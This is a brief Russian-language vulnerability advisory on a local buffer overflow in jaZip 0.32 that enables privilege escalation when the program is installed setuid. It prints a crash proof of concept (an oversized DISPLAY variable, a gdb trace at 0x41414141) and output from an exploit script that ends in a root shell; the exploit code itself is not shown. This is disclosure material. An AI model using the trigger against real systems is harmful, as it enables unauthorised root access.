jaZip - программа для управления Iomega Zip'ом и/или дисками Jaz и дисками под Linux. Уязвимость в программе позволяет локальным пользователям "заставить" программу выполнить произвольный программный код. Иногда программа установлена (хотя администратор, секущий фишку, никогда так не сделает) как setuid, что позволяет получение повышенных привилегий.

Системы уязвимы:
JaZip 0.32 (в том числе патченная до 2-го "уровня")

Пример:
   # export DISPLAY=`perl -e '{print "A"x"2100"}'`
   # gdb /usr/X11R6/bin/jazip
  GNU gdb 19991004
  Copyright 1998 Free Software Foundation, Inc.
  (gdb) r
  Starting program: /usr/X11R6/bin/jazip
  Program received signal SIGSEGV, Segmentation fault.
  0x41414141 in ?? ()
  ----
   $ rpm -q jaZip
  jaZip-0.32-2
   $ ./jazip-exploit.pl
  Address: 0xbffff7ac
  bash#

Код эксплоита

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии